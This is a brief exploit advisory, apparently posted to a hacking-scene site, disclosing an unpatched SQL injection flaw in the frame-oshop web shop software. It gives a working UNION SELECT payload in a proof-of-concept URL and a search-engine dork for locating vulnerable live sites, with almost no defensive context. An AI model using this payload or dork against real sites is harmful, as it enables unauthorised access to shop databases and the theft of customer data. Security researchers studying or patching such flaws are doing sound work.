frame-oshop SQL Injection Vulnerability



product:    frame-oshop

vendor:        http://www.sdaxx.de/
date:        15.05.2011
status:        0day
version:    i dunno...

PoC: http://www.host.com/shop/main.php?id=1111&show=rubrik&rid=-1%20union%20select%201,2,3,4,version(),6,7,8,9,10,11,12

Dork:         "2006 by Sdaxx Rostock" intitle:"frame-oshop"

Note:        -sessid had to be fresh
        -there are more vuln...

>>published by -SmoG- on SceneGround.info<<


gretz to my mentor Therion, c0x and other sg-members!